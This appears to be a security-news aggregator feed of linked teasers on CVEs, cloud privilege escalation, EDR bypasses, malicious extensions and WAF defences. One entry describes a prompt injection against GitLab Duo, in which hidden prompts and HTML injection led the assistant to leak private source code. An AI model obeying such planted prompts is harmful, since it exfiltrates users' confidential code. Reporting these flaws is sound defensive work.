IoT Penetration Testing: From Hardware to Firmware
As Internet of Things (IoT) devices continue to permeate every aspect of modern life, homes, offices, factories, vehicles, their attack surfaces have become increasingly attractive to adversaries. The challenge with testing IoT systems lies in their complexity: these devices often combine physical interfaces, embedded firmware, network services, web applications, and companion mobile apps into a [...]
The post IoT Penetration Testing: From Hardware to Firmware appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/iot-hacking/iot-penetration-testing-from-hardware-to-firmware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
SparkRAT: Exploiting Architectural Weaknesses in Open-Source Offensive Tools
Persistent trend in open-source offensive tooling & implications for defenders
https://www.f5.com/labs/articles/sparkrat-exploiting-architectural-weaknesses-in-open-source-offensive-tools
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Every Reason Why I Hate AI and You Should Too
maybe it's anti-innovation, maybe it's just avoiding hype. But one thing is clear, I'm completely done with hearing about AI.
https://malwaretech.com/2025/08/every-reason-why-i-hate-ai.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Let's get Digital! Updated Digital Identity Guidelines are Here!
Today is the day! Digital Identity Guidelines, Revision 4 is finally here...it's been an exciting journey and NIST is honored to be a part of it. What can we expect? Serving as a culmination of a nearly four-year collaborative process that included foundational research, two public drafts, and about 6,000 individual comments from the public, Revision 4 of Special Publication 800-63, Digital Identity Guidelines, intends to respond to the changing digital landscape that has emerged since the last major revision of this suite, published in 2017. The guidelines presented in Revision 4 explain the
https://www.nist.gov/blogs/cybersecurity-insights/lets-get-digital-updated-digital-identity-guidelines-are-here
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Reflections from the First Cyber AI Profile Workshop
Thank you to everyone who participated in the Cyber AI Profile Workshop NIST hosted this past April! This work intends to support the cybersecurity and AI communities — and the input you provided during this workshop is critical. We are working to publish a Workshop Summary that captures themes and highlights from the event. In the interim, we would like to share a preview of what we heard. Background on the Cyber AI Profile Workshop ( watch the workshop introduction video) As NIST began exploring the idea of a Cyber AI Profile and writing the Cybersecurity and AI Workshop Concept Paper
https://www.nist.gov/blogs/cybersecurity-insights/reflections-first-cyber-ai-profile-workshop
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Nine Years and Counting: NICE RAMPS Communities Keep Expanding Opportunities in Cybersecurity Work and Learning
A lot has changed in America's cybersecurity workforce development ecosystem since 2016: employment in cybersecurity occupations has grown by more than 300,000 [1]; the number of information security degrees awarded annually has more than tripled to nearly 35,000 [2]; and a wide array of new technologies and risks have emerged. Five regional cybersecurity workforce partnerships supported by the 2016 RAMPS program pilot, administered by NIST's NICE Program Office, have weathered the changes in cybersecurity and continue to anchor cybersecurity talent networks in their communities to this day
https://www.nist.gov/blogs/cybersecurity-insights/nine-years-and-counting-nice-ramps-communities-keep-expanding
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The National Cryptologic Foundation Podcast
It was a real honor to appear on the official podcast of the National Cryptologic Foundation, “Cyber Pulse”. They interview a wide range of intriguing personalities working in the cyber and cryptography space, and asked me a broad range of challenging questions about everything from performing forensics on national critical infrastructure – to my move […]
https://tisiphone.net/2025/06/27/the-national-cryptologic-foundation-podcast/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.4.3 and 1.0.9 security patch versions published
Today, we are publishing the 1.4.3 and 1.0.9 security patch versions. We have also added Linux aarch64 (aka ARM64) RPM and DEB installer packages for the 1.4 LTS release.The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version.1.4.3ClamAV 1.4.3 is a patch release with the following fixes: CVE-2025-20260: Fixed a possible buffer overflow write bug in the PDF file parser that could cause a denial-of-service (DoS) condition or enable remote code execution.This issue only affects configurations where both:The max file-size scan limit is set greater than or equal to 1024MB.The...
https://blog.clamav.net/2025/06/clamav-143-and-109-security-patch.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
F5 Labs Top CWEs & OWASP Top Ten Analysis
We expand our view to include CWE and OWASP, and we also examine the latest overall trends for June 2025.
https://www.f5.com/labs/articles/f5-labs-top-cwes-owasp-top-ten-analysis
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Information Disclosure on SSLVPN endpoint
CVSSv3 Score:
3.9
An Exposure of Sensitive Information to an Unauthorized Actor vulnerability [CWE-200] in FortiOS SSL-VPN web-mode may allow an authenticated user to access full SSL-VPN settings via crafted URL.
Revised on 2026-06-15 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-257
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Delving Into the SparkRAT Remote Access Tool
Sensor Intel Series: May 2025 CVE Trends
https://www.f5.com/labs/articles/delving-into-the-sparkrat-remote-access-tool
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Remote Prompt Injection in GitLab Duo Leaks Source Code
A remote prompt injection vulnerability in GitLab Duo allowed attackers to steal source code from private projects, manipulate code suggestions, and exfiltrate confidential information. The attack chain involved hidden prompts, HTML injection, and exploitation of Duo's access to private data. GitLab has since patched both the HTML and prompt injection vectors.
https://www.cloudvulndb.org/gitlab-duo-prompt-injection-leak
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AWS Security Tool Introduces Privilege Escalation Risk
AWS's Account Assessment for AWS Organizations tool, designed to audit cross-account access, inadvertently introduced privilege escalation risks due to flawed deployment instructions. Customers were encouraged to deploy the tool in lower-sensitivity accounts, creating risky trust paths from insecure environments into highly sensitive ones. This could allow attackers to pivot from compromised development accounts into production and management accounts.
https://www.cloudvulndb.org/aws-security-tool-risk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
FreeRTOS and coreSNTP Security Advisories
Security advisories were issued for FreeRTOS and coreSNTP releases containing unintended scripts that could potentially transmit AWS credentials if executed on Linux/macOS. Affected releases have been removed and users are advised to rotate credentials and delete downloaded copies.
https://www.cloudvulndb.org/freertos-coresntp-advisories
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Azure AZNFS-mount Utility Root Privilege Escalation
A critical vulnerability in AZNFS-mount utility, preinstalled on Azure HPC/AI images, allowed unprivileged users to escalate privileges to root on Linux machines. The flaw existed in versions up to 2.0.10 and involved a SUID binary. Azure classified it as low severity but fixed it in version 2.0.11.
https://www.cloudvulndb.org/azure-aznfs-mount-privilege-escalation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AWS Default Roles Can Lead to Service Takeover
Research uncovered security flaws in default AWS service roles, granting overly broad permissions like full S3 access. This allows privilege escalation, cross-service access, and potential account compromise across services like SageMaker, Glue, and EMR. Attackers could exploit these roles to manipulate critical assets and move laterally within AWS environments. AWS has since updated default policies and documentation to mitigate risks.
https://www.cloudvulndb.org/aws-default-roles-service-takeover
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google Cloud ConfusedComposer Privilege Escalation Vulnerability
Tenable discovered a privilege escalation vulnerability in Google Cloud Platform's Cloud Composer service, dubbed ConfusedComposer. It allowed users with composer.environments.update permission to escalate privileges to the default Cloud Build service account by injecting malicious PyPI packages. This could grant broad permissions across the victim's GCP project.
https://www.cloudvulndb.org/gcp-confused-composer-vulnerability
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Burning Data with Malicious Firewall Rules in Azure SQL
Varonis Threat Labs discovered a vulnerability in Azure SQL Server allowing privileged users to create malicious firewall rules that can delete Azure resources when triggered by admin actions. The exploit involves manipulating rule names via TSQL to inject destructive commands, potentially leading to large-scale data loss in affected Azure accounts.
https://www.cloudvulndb.org/burning-data-azure-sql-firewall
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Path Traversal in AWS SSM Agent Plugin ID Validation
A path traversal vulnerability in AWS SSM Agent's ValidatePluginId function allows attackers to create directories and execute scripts in unintended locations on the filesystem. This could lead to privilege escalation or other malicious activities, as files may be written to or executed from sensitive areas of the system with root privileges.
https://www.cloudvulndb.org/aws-ssm-agent-path-traversal
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ImageRunner: Privilege Escalation Vulnerability in GCP Cloud Run
An attacker with `run.services.update` and `iam.serviceAccounts.actAs` permissions but without
explicit registry access could deploy new revisions of Cloud Run services that pulled private
container images stored in the same GCP project. This was possible because Cloud Run uses a
service agent with the necessary registry read permissions to retrieve these images, regardless
of the caller's access level. By updating a service revision and injecting malicious commands
into the container's arguments (e.g., using Netcat for reverse shell access), attackers could
extract secrets or run unauthorized code. The flaw stemmed from the Cloud Run service agent's
trust model, which did not enforce a separate registry permission check on the deploying identity.
Google has since modified this behavior...
https://www.cloudvulndb.org/imagerunner
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.5.0 beta now available!
The ClamAV 1.5.0 beta is now available. You may find the source code and installers for this release at clamav.net/downloads or on the ClamAV GitHub release page. The beta phase is expected to last two to four weeks before we publish the stable release or else publish a release candidate. This will depend on how many changes are required to stabilize this version. Please take this time to evaluate ClamAV 1.5.0. Please help us validate this release by providing feedback via GitHub issues, via the ClamAV mailing list or on our Discord. IMPORTANT: A major feature of the 1.5 release is a FIPS-compliant method for verifying the authenticity of CVD signature database archives and CDIFF signature database patch files. The feature is ready to test in this beta, but we are not yet distributing the...
https://blog.clamav.net/2025/03/clamav-150-beta-now-available.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
2025 Advanced Persistent Bots Report
Uncovering the true scale of persistent bot activity, and the advanced techniques that bot operators use in order to remain hidden from bot defenses.
https://www.f5.com/labs/articles/2025-advanced-persistent-bots-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The US Needs A New Cybersecurity Strategy: More Offensive Cyber Operations Isn't It
For a long time Chinese hackers have been operating in the grey area between espionage and warfare. The US has been struggling to defend its networks, but increasing offensive cyber operations in unlikely to help.
https://malwaretech.com/2025/03/the-us-needs-a-new-cybersecurity-strategy.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Advance notice: End of Life for ClamAV 0.103 database updates
ClamAV version 0.103 will reach its end of life (EOL) for database updates on September 14, 2025. After this date, this version will no longer receive the latest virus definitions. To ensure your systems remain protected, please upgrade to the latest supported version of ClamAV before the end-of-life date. This will provide continued access to essential security updates and features. We recommend that users update to the newest release, ClamAV 1.4 LTS. For users that are unable to upgrade to version 1.4, you may find that ClamAV 1.0 LTS is more suitable. The most recent version of ClamAV can be found on the ClamAV Downloads page, on the ClamAV GitHub Releases page, and through Docker Hub. Information about how to install ClamAV is available in our online documentation. The...
https://blog.clamav.net/2025/03/advance-notice-end-of-life-for-clamav.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Why Critical MongoDB Library Flaws Won't See Mass Exploitation
Discover how to mitigate CVE-2024-53900 and CVE-2025-23061, which expose Node.js APIs to remote attacks.
https://www.f5.com/labs/articles/why-critical-mongodb-library-flaws-wont-see-mass-exploitation
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Pre-authentication Denial of Service attack in OpenSSH - CVE-2025-26466
CVSSv3 Score:
5.9
CVE-2025-26466A flaw was found in the OpenSSH package. For each ping packet the SSH server receives, a pong packet is allocated in a memory buffer and stored in a queue of packages. It is only freed when the server/client key exchange has finished. A malicious client may keep sending such packages, leading to an uncontrolled increase in memory consumption on the server side. Consequently, the server may become unavailable, resulting in a denial of service attack.
Revised on 2026-05-25 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-25-122
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Analysis of an advanced malicious Chrome extension
Two weeks ago I published an article on 63 malicious Chrome extensions. In most cases I could only identify the extensions as malicious. With large parts of their logic being downloaded from some web servers, it wasn't possible to analyze their functionality in detail.
However, for the Download Manager Integration Checklist extension I have all parts of the puzzle now. This article is a technical discussion of its functionality that somebody tried very hard to hide. I was also able to identify a number of related extensions that were missing from my previous article.
Update (2025-02-04): An update to Download Manager Integration Checklist extension has been released a day before I published this article, clearly prompted by me asking adindex about this. The update removes the malicious functionality...
https://palant.info/2025/02/03/analysis-of-an-advanced-malicious-chrome-extension/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.4.2 and 1.0.8 security patch versions published
Today, we are publishing the 1.4.2 and 1.0.8 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version.1.4.2
ClamAV 1.4.2 is a patch release with the following fixes: CVE-2025-20128: Fixed a possible buffer overflow read bug in the OLE2 file parser that could cause a denial-of-service (DoS) condition. This issue was introduced in version 1.0.0 and affects all currently supported versions. It will be fixed in:
1.4.2 and 1.0.8 Thank you to OSS-Fuzz for identifying this issue.
1.0.8
ClamAV 1.0.8 is a patch release with the following fixes:CVE-2025-20128:...
https://blog.clamav.net/2025/01/clamav-142-and-108-security-patch.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Malicious extensions circumvent Google's remote code ban
As noted last week I consider it highly problematic that Google for a long time allowed extensions to run code they downloaded from some web server, an approach that Mozilla prohibited long before Google even introduced extensions to their browser. For years this has been an easy way for malicious extensions to hide their functionality. When Google finally changed their mind, it wasn't in form of a policy but rather a technical change introduced with Manifest V3.
As with most things about Manifest V3, these changes are meant for well-behaving extensions where they in fact improve security. As readers of this blog probably know, those who want to find loopholes will find them: I've already written about the Honey extension bundling its own JavaScript interpreter and malicious extensions...
https://palant.info/2025/01/20/malicious-extensions-circumvent-googles-remote-code-ban/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Chrome Web Store is a mess
Let's make one thing clear first: I'm not singling out Google's handling of problematic and malicious browser extensions because it is worse than Microsoft's for example. No, Microsoft is probably even worse but I never bothered finding out. That's because Microsoft Edge doesn't matter, its market share is too small. Google Chrome on the other hand is used by around 90% of the users world-wide, and one would expect Google to take their responsibility to protect its users very seriously, right? After all, browser extensions are one selling point of Google Chrome, so certainly Google would make sure they are safe?
Unfortunately, my experience reporting numerous malicious or otherwise problematic browser extensions speaks otherwise. Google appears to take the “least effort required”...
https://palant.info/2025/01/13/chrome-web-store-is-a-mess/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
BIScience: Collecting browsing history under false pretenses
This is a guest post by a researcher who wants to remain anonymous. You can contact the author via email.
Recently, John Tuckner of Secure Annex and Wladimir Palant published great research about how BIScience and its various brands collect user data. This inspired us to publish part of our ongoing research to help the extension ecosystem be safer from bad actors.
This post details what BIScience does with the collected data and how their public disclosures are inconsistent with actual practices, based on evidence compiled over several years.
Screenshot of claims on the BIScience website
Contents
Who is BIScience?
BIScience collects data from millions of users
BIScience buys data from partner third-party extensions
BIScience receives raw...
https://palant.info/2025/01/13/biscience-collecting-browsing-history-under-false-pretenses/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.4 as Next Long-Term Stable (LTS)
We are excited to announce that ClamAV 1.4 is now designated as our latest Long-Term Stable (LTS) release. Previously, we planned to announce 1.5 as the next LTS version at the end of 2024. However, unforeseen challenges have delayed the 1.5 release, leading us to choose version 1.4 for long-term support. We apologize for any inconvenience that our delay in the announcement may have caused. The version support dates for ClamAV 1.4 are amended as follows: Key Dates: Initial 1.4 Release Date: August 15, 2024 Patch Versions Continue Until: August 15, 2027 DB Downloads Allowed Until: August 15, 2028 For specific details, please read the ClamAV EOL Policy. Looking ahead, the beta version of ClamAV 1.5 will soon be available for community review. This version will...
https://blog.clamav.net/2025/01/clamav-14-as-next-long-term-stable-lts.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions published
Today, we are publishing the 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and (with exception to 0.103.12) through Docker Hub.The images on Docker Hub may not be immediately available on release day.Continue reading to learn what changed in each version.1.4.1ClamAV 1.4.1 is a critical patch release with the following fixes:CVE-2024-20506: Changed the logging module to disable following symlinks on Linux and Unix systems so as to prevent an attacker with existing access to the 'clamd' or 'freshclam' services from using a symlink to corrupt system files.This issue affects all currently supported versions. It will be fixed in:1.4.11.3.21.0.70.103.12Thank...
https://blog.clamav.net/2024/09/clamav-141-132-107-and-010312-security.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2024-38063 - Remotely Exploiting The Kernel Via IPv6
Performing a root cause analysis & building proof-of-concept for CVE-2024-38063, a CVSS 9.8 Vulnerability In the Windows Kernel IPv6 Parser
https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bypassing EDRs With EDR-Preloading
Evading user mode EDR hooks by hijacking the AppVerifier layer
https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Silly EDR Bypasses and Where To Find Them
Abusing exception handlers to hook and bypass user mode EDR hooks.
https://malwaretech.com/2023/12/silly-edr-bypasses-and-where-to-find-them.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
An Introduction to Bypassing User Mode EDR Hooks
Understanding the basics of user mode EDR hooking, common bypass techniques, and their limitations.
https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
It might Be Time to Rethink Phishing Awareness
Phishing awareness can be a powerful security tool, or a complete disaster. It all hinges on how you implement it.
https://malwaretech.com/2023/09/it-might-be-time-to-rethink-phishing-awareness.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A Realistic Look at Implications of ChatGPT for Cybercrime
Analyzing ChatGPT's capabilities and various claims about how it will revolutionize cybercrime.
https://malwaretech.com/2023/02/a-realistic-look-at-chatgpt-cybercrime.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
On Tuesday, November 1 2022 between 1300-1700 UTC, the OpenSSL project announced the release of a new version of OpenSSL (version 3.0.7) that will patch a critical vulnerability in OpenSSL version 3.0 and above. Only OpenSSL versions between 3.0 and 3.0.6 are affected at the time of writing. At this moment the details of this [...]
The post CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/general-tutorials/openssl-3-0-7-patches-critical-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Student Loan Breach Exposes 2.5M Records
2.5 million people were affected, in a breach that could spell more trouble down the line.
https://threatpost.com/student-loan-breach-exposes-2-5m-records/180492/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Watering Hole Attacks Push ScanBox Keylogger
Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.
https://threatpost.com/watering-hole-attacks-push-scanbox-keylogger/180490/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Tentacles of ‘0ktapus' Threat Group Victimize 130 Firms
Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.
https://threatpost.com/0ktapus-victimize-130-firms/180487/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ransomware Attacks are on the Rise
Lockbit is by far this summer's most prolific ransomware group, trailed by two offshoots of the Conti group.
https://threatpost.com/ransomware-attacks-are-on-the-rise/180481/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cybercriminals Are Selling Access to Chinese Surveillance Cameras
Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.
https://threatpost.com/cybercriminals-are-selling-access-to-chinese-surveillance-cameras/180478/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Twitter Whistleblower Complaint: The TL;DR Version
Twitter is blasted for security and privacy lapses by the company's former head of security who alleges the social media giant's actions amount to a national security risk.
https://threatpost.com/twitter-whistleblower-tldr-version/180472/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Firewall Bug Under Active Attack Triggers CISA Warning
CISA is warning that Palo Alto Networks' PAN-OS is under active attack and needs to be patched ASAP.
https://threatpost.com/firewall-bug-under-active-attack-cisa-warning/180467/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Fake Reservation Links Prey on Weary Travelers
Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.
https://threatpost.com/reservation-links-prey-on-travelers/180462/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
iPhone Users Urged to Update to Patch 2 Zero-Days
Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.
https://threatpost.com/iphone-users-urged-to-update-to-patch-2-zero-days-under-attack/180448/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google Patches Chrome's Fifth Zero-Day of the Year
An insufficient validation input flaw, one of 11 patched in an update this week, could allow for arbitrary code execution and is under active attack.
https://threatpost.com/google-patches-chromes-fifth-zero-day-of-the-year/180432/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Installing Rogue-jndi on Kali Linux
Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example) in response to the forged [...]
The post Installing Rogue-jndi on Kali Linux appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/general-tutorials/installing-rogue-jndi-on-kali-linux/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Log4Shell VMware vCenter Server (CVE-2021-44228)
Log4Shell is a critical vulnerability with the highest possible CVSSv3 score of 10.0 that affects thousands of products running Apache Log4j and leaves millions of targets potentially vulnerable. CVE-2021-44228 affects log4j versions 2.0-beta9 to 2.14.1. Log4j is an incredibly popular logging library used in many different products and various Apache frameworks like Struts2, Kafka, and [...]
The post Log4Shell VMware vCenter Server (CVE-2021-44228) appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/log4shell-vmware-vcenter-server-cve-2021-44228/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to customize behavior of AWS Managed Rules for AWS WAF
AWS Managed Rules for AWS WAF provides a group of rules created by AWS that can be used help protect you against common application vulnerabilities and other unwanted access to your systems without having to write your own rules. AWS Threat Research Team updates AWS Managed Rules to respond to an ever-changing threat landscape in order […]
https://aws.amazon.com/blogs/security/how-to-customize-behavior-of-aws-managed-rules-for-aws-waf/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
Recently a “design flaw” in the Microsoft Exchange’s Autodiscover protocol was discovered by researchers that allowed access to 372,072 Windows domain credentials and 96,671 unique sets of credentials from applications such as Microsoft Outlook and third-party email clients. According to Amit Serper , the person who discovered the flaw, the source of the leak is [...]
The post The Great Leak: Microsoft Exchange AutoDiscover Design Flaw appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/pentesting-exchange/the-great-leak-microsoft-exchange-autodiscover-design-flaw/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The three most important AWS WAF rate-based rules
May 5, 2025: This post has been updated to reflect that the lowest allowable rate limit setting in AWS WAF rate-based rules has changed from 100 requests to 10. In this post, we explain what the three most important AWS WAF rate-based rules are for proactively protecting your web applications against common HTTP flood events, […]
https://aws.amazon.com/blogs/security/three-most-important-aws-waf-rate-based-rules/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Automatically update AWS WAF IP sets with AWS IP ranges
Note: This blog post describes how to automatically update AWS WAF IP sets with the most recent AWS IP ranges for AWS services. This related blog post describes how to perform a similar update for Amazon CloudFront IP ranges that are used in VPC Security Groups. You can use AWS Managed Rules for AWS WAF […]
https://aws.amazon.com/blogs/security/automatically-update-aws-waf-ip-sets-with-aws-ip-ranges/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AWS Shield threat landscape review: 2020 year-in-review
AWS Shield is a managed service that protects applications that are running on Amazon Web Services (AWS) against external threats, such as bots and distributed denial of service (DDoS) attacks. Shield detects network and web application-layer volumetric events that may indicate a DDoS attack, web content scraping, or other unauthorized non-human traffic that is interacting […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-review-2020-year-in-review/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to protect a self-managed DNS service against DDoS attacks using AWS Global Accelerator and AWS Shield Advanced
In this blog post, I show you how to improve the distributed denial of service (DDoS) resilience of your self-managed Domain Name System (DNS) service by using AWS Global Accelerator and AWS Shield Advanced. You can use those services to incorporate some of the techniques used by Amazon Route 53 to protect against DDoS attacks. […]
https://aws.amazon.com/blogs/security/how-to-protect-a-self-managed-dns-service-against-ddos-attacks-using-aws-global-accelerator-and-aws-shield-advanced/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Set up centralized monitoring for DDoS events and auto-remediate noncompliant resources
When you build applications on Amazon Web Services (AWS), it's a common security practice to isolate production resources from non-production resources by logically grouping them into functional units or organizational units. There are many benefits to this approach, such as making it easier to implement the principal of least privilege, or reducing the scope of […]
https://aws.amazon.com/blogs/security/set-up-centralized-monitoring-for-ddos-events-and-auto-remediate-noncompliant-resources/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Deploying defense in depth using AWS Managed Rules for AWS WAF (part 2)
In this post, I show you how to use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. In part 1 of this post I describe the technologies […]
https://aws.amazon.com/blogs/security/deploying-defense-in-depth-using-aws-managed-rules-for-aws-waf-part-2/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Defense in depth using AWS Managed Rules for AWS WAF (part 1)
In this post, I discuss how you can use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. The post is in two parts. This first part describes […]
https://aws.amazon.com/blogs/security/defense-in-depth-using-aws-managed-rules-for-aws-waf-part-1/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Houston consulate one of worst offenders in Chinese espionage, say U.S. officials
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: Reuters The United States ordered the consulate closed this week, leading China to retaliate on Friday by telling the United States to shut its consulate in the city of Chengdu, as relations between the world's two largest economies […]
The post Houston consulate one of worst offenders in Chinese espionage, say U.S. officials appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/07/24/houston-consulate-one-of-worst-offenders-in-chinese-espionage-say-u-s-officials/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register The denizens of online forums dedicated to trading in stolen credit cards have been shown to be wretched hives of scum and villainy. This not-so-surprising news comes this week via academics at Washington State University (WSU) in the US, […]
The post Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/07/24/shocked-i-am-shocked-to-find-that-underground-bank-card-trading-forums-are-full-of-liars-cheats-small-time-grifters/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AWS Shield Threat Landscape report is now available
AWS Shield is a managed threat protection service that safeguards applications running on AWS against exploitation of application vulnerabilities, bad bots, and Distributed Denial of Service (DDoS) attacks. The AWS Shield Threat Landscape Report (TLR) provides you with a summary of threats detected by AWS Shield. This report is curated by the AWS Threat Research […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-report-now-available/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vint Cerf suggests GDPR could hurt coronavirus vaccine development
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register TCP-IP-co-developer Vint Cerf, revered as a critical contributor to the foundations of the internet, has floated the notion that privacy legislation might hinder the development of a vaccination for the COVID-19 coronavirus. In an essay written for […]
The post Vint Cerf suggests GDPR could hurt coronavirus vaccine development appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/16/vint-cerf-suggests-gdpr-could-hurt-coronavirus-vaccine-development/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Brit defense contractor hacked, up to 100,000 past and present employees' details siphoned off – report
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Britain’s Ministry of Defence contractor Interserve has been hacked, reportedly leaking the details of up to 100,000 of past and current employees, including payment information and details of their next of kin. The Daily Telegraph reports that up to […]
The post Brit defense contractor hacked, up to 100,000 past and present employees’ details siphoned off – report appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/16/brit-defense-contractor-hacked-up-to-100000-past-and-present-employees-details-siphoned-off-report/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
US officially warns China is launching cyberattacks to steal coronavirus research
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: CNN The US Department of Homeland Security and the FBI issued a “public service announcement” Wednesday warning that China is likely launching cyberattacks to steal coronavirus data related to vaccines and treatments from US research institutions and pharmaceutical […]
The post US officially warns China is launching cyberattacks to steal coronavirus research appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
